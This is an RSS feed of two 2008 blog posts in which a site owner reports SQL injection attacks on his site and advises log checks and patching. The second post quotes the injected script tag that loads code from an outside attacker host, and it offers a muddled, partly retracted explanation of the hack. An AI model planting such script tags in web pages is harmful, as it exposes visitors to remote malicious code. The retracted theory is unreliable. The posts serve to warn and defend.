<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>rumblepup - entrepreneurial spirit &#187; bomb</title>
	<atom:link href="http://www.rumblepup.com/tag/bomb/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.rumblepup.com</link>
	<description>I&#039;m not a player, I just crush alot</description>
	<lastBuildDate>Sun, 11 Apr 2010 16:19:11 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>SQL injection attack.  Found the code being used.</title>
		<link>http://www.rumblepup.com/sql-injection-attack-found-the-code-being-used/</link>
		<comments>http://www.rumblepup.com/sql-injection-attack-found-the-code-being-used/#comments</comments>
		<pubDate>Fri, 06 Jun 2008 21:10:46 +0000</pubDate>
		<dc:creator>rumblepup</dc:creator>
				<category><![CDATA[The Internet]]></category>
		<category><![CDATA[bomb]]></category>
		<category><![CDATA[sql injection]]></category>
		<category><![CDATA[website hack]]></category>

		<guid isPermaLink="false">http://www.rumblepup.com/?p=33</guid>
		<description><![CDATA[Ok, the latest state of sql injection attacks have been a nightmare.  We got hacked again, but this time, with a insertion at the url level.  These are a little easier to track. In the server logs, we found the following code in different formats.

Code was messing up my layout.  check out the [...]]]></description>
			<content:encoded><![CDATA[<p></p><div class="tweetmeme_button" style="float: right; margin-left: 10px;"><a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.rumblepup.com%2Fsql-injection-attack-found-the-code-being-used%2F"><img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.rumblepup.com%2Fsql-injection-attack-found-the-code-being-used%2F" height="61" width="51" /></a></div><p>Ok, the latest state of sql injection attacks have been a nightmare.  We got hacked again, but this time, with a insertion at the url level.  These are a little easier to track. In the server logs, we found the following code in different formats.</p>
<blockquote>
<h5><em>Code was messing up my layout.  check out the text file <a href="http://www.rumblepup.com/sqlattack.txt">here</a>.<br />
</em></h5>
</blockquote>
<p>So look through your server logs for this code in the url with a GET statement.  Have your coder or web programmer disallow all all of the elements being used in the statement.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.rumblepup.com/sql-injection-attack-found-the-code-being-used/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The xiaobaishan bomb is now the flyzhu.9966 bomb.</title>
		<link>http://www.rumblepup.com/the-xiaobaishan-bomb-is-now-the-flyzhu-bomb/</link>
		<comments>http://www.rumblepup.com/the-xiaobaishan-bomb-is-now-the-flyzhu-bomb/#comments</comments>
		<pubDate>Wed, 04 Jun 2008 15:05:11 +0000</pubDate>
		<dc:creator>rumblepup</dc:creator>
				<category><![CDATA[The Internet]]></category>
		<category><![CDATA[bomb]]></category>
		<category><![CDATA[sql injection]]></category>

		<guid isPermaLink="false">http://www.rumblepup.com/?p=31</guid>
		<description><![CDATA[Updated from: The xiaobaishan bomb.
Ok, when I posted about the xiaobaishan bomb, apparently the site this little hackermuffin was using went blammo, so he picked a new one.  We where hacked againg, this the script calling:
&#60;script src=http://flyzhu.9966.org/us/Help.asp&#62;&#60;/script&#62;
Tricky little fucker.
In fact, this hack is pretty well thought out.  Like I said on a previous [...]]]></description>
			<content:encoded><![CDATA[<p></p><div class="tweetmeme_button" style="float: right; margin-left: 10px;"><a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.rumblepup.com%2Fthe-xiaobaishan-bomb-is-now-the-flyzhu-bomb%2F"><img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.rumblepup.com%2Fthe-xiaobaishan-bomb-is-now-the-flyzhu-bomb%2F" height="61" width="51" /></a></div><p>Updated from: <a href="http://www.rumblepup.com/the-xiaobaishan-bomb-thousands-of-sites-hacked/">The xiaobaishan bomb.</a></p>
<p>Ok, when I posted about the xiaobaishan bomb, apparently the site this little hackermuffin was using went blammo, so he picked a new one.  We where hacked againg, this the script calling:</p>
<blockquote><p>&lt;script src=http://<strong>flyzhu.9966.org</strong>/us/Help.asp&gt;&lt;/script&gt;</p></blockquote>
<p>Tricky little fucker.</p>
<p>In fact, this hack is pretty well thought out.  Like I said on a previous post, this was a sql injection, but our application is made to block sql injection of all kinds.  What happened?</p>
<p>This is a Windows vulnerability.  What the hacker did was attempt to run around the code and gain access to the asp.net Windows Media Player library via our /images/ folder.  They found an image they liked, They ran a some kind of script, and gained access to run a sql insertion script that the application itself did not allow.</p>
<p><strong><span style="color: #993300;">UPDATE:</span> I&#8217;ve got <a href="http://www.rumblepup.com/latest-info-on-sql-injection-attack/">new info</a> on this. </strong> It&#8217;s a pure sql injection hack.</p>
<p>Sneaky fucker.</p>
<p><span style="text-decoration: line-through;">Apparently, this a vulnerability that Microsoft put out a patch to, and our hosting provider didn&#8217;t run it against our VPS yet. </span></p>
<p><span style="color: #993300;"><strong>UPDATE:  Yes they did.  Whoopsee.</strong></span></p>
<p>So to protect your server against this hack, have your hosting provider run the latest updates for the vulnerability.</p>
<p>Right now, there is a reported 10,000 sites affected by this hack.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.rumblepup.com/the-xiaobaishan-bomb-is-now-the-flyzhu-bomb/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
	</channel>
</rss>
